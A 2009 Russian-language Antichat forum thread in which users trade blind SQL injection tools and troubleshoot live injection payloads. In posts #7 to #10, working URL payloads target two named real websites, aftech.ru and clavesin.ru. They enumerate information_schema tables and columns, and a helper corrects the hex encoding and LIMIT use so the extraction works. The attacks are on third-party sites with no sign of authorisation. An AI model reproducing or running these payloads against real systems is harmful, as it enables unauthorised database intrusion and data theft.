ANTICHAT Forum
HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
НОВЫЕ ТОРГОВАЯ НОВОСТИ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 30.05.2009, 23:15
YuNi|[c
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
С нами: 10340793

Репутация: 66
По умолчанию

кто нибудь дайте линк на словари таблиц на Mysql. Раньше юзал но шас хз не помню
 
Ответить с цитированием

  #2  
Старый 30.05.2009, 23:58
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами: 9649706

Репутация: 3338


По умолчанию

здесь есть:

тут
 
Ответить с цитированием

  #3  
Старый 31.05.2009, 08:29
YuNi|[c
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
С нами: 10340793

Репутация: 66
По умолчанию

Цитата:
Сообщение от Pashkela  
здесь есть:

тут
спс у меня sipt4 есть, но как раз для него ещу дополнително
 
Ответить с цитированием

  #4  
Старый 31.05.2009, 00:05
DeepXhadow
Познающий
Регистрация: 19.04.2008
Сообщений: 67
С нами: 9505375

Репутация: 19
По умолчанию

Посоветуйте какую-нить прогу для Blind sql inj.... Архив Grey'a выдает CRC Еррор
 
Ответить с цитированием

  #5  
Старый 31.05.2009, 02:14
DimOnOID
Постоянный
Регистрация: 05.12.2006
Сообщений: 477
С нами: 10226672

Репутация: 441
По умолчанию

Цитата:
Сообщение от DeepXhadow  
Посоветуйте какую-нить прогу для Blind sql inj.... Архив Grey'a выдает CRC Еррор
Скрипт от Грея
залил
_http://www.sendspace.com/file/6e3r62
а вообще..ещё посоветую bsqlbf
 
Ответить с цитированием

  #6  
Старый 31.05.2009, 01:56
R1dex
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
С нами: 9288132

Репутация: 571
По умолчанию

Неужели в гугле не найти?
Тот же sipt4..
 
Ответить с цитированием

blind sql inj
  #7  
Старый 31.05.2009, 13:58
DeepXhadow
Познающий
Регистрация: 19.04.2008
Сообщений: 67
С нами: 9505375

Репутация: 19
По умолчанию blind sql inj

Цитата:
Сообщение от R1dex  
Неужели в гугле не найти?
Тот же sipt4..
Нету в сипте 4 посимвольного брута....


Еще вопрос по blind...
Код:
http://www.aftech.ru/about/news/?nid=10+and+ascii(substring((select+table_name+from+information_schema.tables+limit+1,1),1,1))>=1--
Код:
http://www.aftech.ru/about/news/?nid=10+and+ascii(substring((select+table_name+from+information_schema.tables+limit+1,1),1,1))>=200--
Видно что вывод разный, написал кое-как кривой скрипт, сдампил таблицы...

терь вопрос почему
Код:
http://www.aftech.ru/about/news/?nid=10+and+ascii(substring((select+COLUMN_NAME+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x276E65777327),1,1))>=1--
и
Код:
http://www.aftech.ru/about/news/?nid=10+and+ascii(substring((select+COLUMN_NAME+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x276E65777327),1,1))>=200--
Возвращают одинаковые результаты...
таблица 0x276E65777327=news точно есть, т к
Код:
http://www.aftech.ru/about/news/?nid=10+and+ascii(substring((select+*+FROM+news),1,1))>=1--
 
Ответить с цитированием

  #8  
Старый 31.05.2009, 14:04
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами: 10585560

Репутация: 1550


По умолчанию

2DeepXhadow как нет посимвольного брута в сипт4?
select+table_name+from+information_schema.tables+l imit+{N16-300},1
 
Ответить с цитированием

  #9  
Старый 31.05.2009, 14:35
laedafess
Познающий
Регистрация: 11.02.2009
Сообщений: 98
С нами: 9076508

Репутация: 169
По умолчанию

DeepXhadow
Код:
http://www.aftech.ru/about/news/?nid=10+and+ascii(substring((select+COLUMN_NAME+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x6E657773+limit+1,1),1,1))>=1--
1) При выводе колонок тоже нужен limit;
2) Хексить нужно значение без кавычек, т.е. news=0x6e657773, а не 0x276E65777327.
 
Ответить с цитированием

  #10  
Старый 01.06.2009, 00:07
nemaniak
Участник форума
Регистрация: 10.06.2008
Сообщений: 201
С нами: 9431076

Репутация: 229
По умолчанию

Есть инъекция, число колонок то я нашел, но дальше при выполнения запроса
http://www.clavesin.ru/addcard?dataID=-1227+union+select+1,2,3
происходит редирект. Что с этим можно сделать, кроме как посимвольно брутить?

Последний раз редактировалось nemaniak; 01.06.2009 в 00:10..
 
Ответить с цитированием
Ответ



Предыдущая тема Следующая тема
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 11 (пользователей: 0 , гостей: 11)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.